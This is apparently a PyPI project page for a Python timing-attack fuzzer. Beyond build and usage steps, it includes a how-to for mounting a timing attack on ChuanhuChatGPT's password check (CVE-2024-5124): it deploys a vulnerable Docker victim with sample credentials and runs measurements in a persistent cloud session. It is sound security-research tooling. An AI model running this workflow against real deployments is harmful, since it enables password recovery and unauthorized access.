modular time fuzzer
Project description
I Tutorials:
I.1/ Build modular-timing-fuzzer
Install dependencies
virtualenv -p python3 venv3 ;
source venv3/bin/activate &&
pip install argparse requests matplotlib scipy pandas
Then run:
python3 -m pip install build &&
python3 -m build &&
python3 -m pip install -e . &&
python3 -m pip install dist/modular_time_fuzzer_GOGO-0.0.1-py3-none-any.whl --force-reinstall
I.2/ Install From Pypi
Run simply:
pip install modular-time-fuzzer
I.3/ Usage
measure
command line permits to choose inputs that will be recorded to the database.
analyze
command line permits to represent the data collected to a picture graph.
measure -r 10 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z "out.sqlite"
analyze -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z "out.sqlite"
II How-to:
II.1/ developping timing attack against the password verification of Chuanchuangpt (CVE-2024-5124) using a cloud service in background
II.1.1/ Deploy victim server:
Install docker
# Install packages required for the installation
sudo apt-get update
sudo apt install --yes ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/debian/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
# Add the repository to Apt sources:
echo \
"deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/debian \
$(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt-get update
# Download GPG key and store repository in the system
curl -fsSL https://download.docker.com/linux/debian/gpg | gpg --dearmor -o /usr/share/keyrings/docker.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker.gpg] https://download.docker.com/linux/debian bookworm stable" |tee /etc/apt/sources.list.d/docker.list > /dev/null
apt update
# Install Docker packages
sudo apt install --yes docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
Run victim server
export JSON='{
"users": [["openai", "isCloseAi"]]
}' ;
export DOCKER_CMD="apt update && apt install --yes git && pip install itsdangerous gradio && echo '${JSON}' > config.json && sed -i 's/share=share/share=True/g' ChuanhuChatbot.py && python3 -u ChuanhuChatbot.py 2>&1 | tee /var/log/application.log"
export DOCKER_RUN='sudo docker run -e language=en_US -it tuchuanhuhuhu/chuanhuchatgpt:20240310 /bin/bash -c "${DOCKER_CMD}"'
tmux new-session -d -s persistent_server "${DOCKER_RUN}"
tmux attach -t persistent_server
II.1.2/ Attack the victim server
If you want to run these two scripts
measure -r 1000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z "out.sqlite"
analyze -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z "out.sqlite"
On a cloud backend to ensure it will never exit, install previously mentionned dependencies and run:
tmux new-session -d -s persistent_session "source ./venv3/bin/activate && rm -Rf mkdir tmpdir/ && mkdir tmpdir/ ; measure -r 1000 -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z 'out.sqlite' && analyze -c a -c b -c c -c d -c e -c f -c g -c h -c i -c j -c k -c l -c m -c n -c o -c p -c q -c r -c s -c t -c u -c v -c w -c x -c y -c z 'out.sqlite'"
tmux attach -t persistent_session
III/ API reference for developpers
IV/ Why using a modular timing attack fuzzer?
Trough there are a lot of similar tool for recording request time such as tlsfuzzer
or timeinator
, none of them provide enough flexibility to let the user record it own timing with modularity.
modular-timing-fuzzer
then has chosen to let the user to script the recording interface in a modular way and then use the output recorded to interpret in in a less but still modular way.
IV.1 / attacks against passwords authentication with unsecure crypto comparison.
IV.2 / attacks against assymetric encryption algorithms.
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distributions
Built Distribution
File details
Details for the file modular_time_fuzzer-0.0.4-py3-none-any.whl
.
File metadata
- Download URL: modular_time_fuzzer-0.0.4-py3-none-any.whl
- Upload date:
- Size: 7.0 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.11.2
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 74ce9c34aaa0330fcbefd49da0523f39aaa7ed9628878f9e92e232deb27f3f89 |
|
MD5 | d3fb94235ae01c9cece8c8a866ce6f09 |
|
BLAKE2b-256 | 171861c8236ef4946b3e3175912d702f643b64519a312cf9928ecc534828a6bf |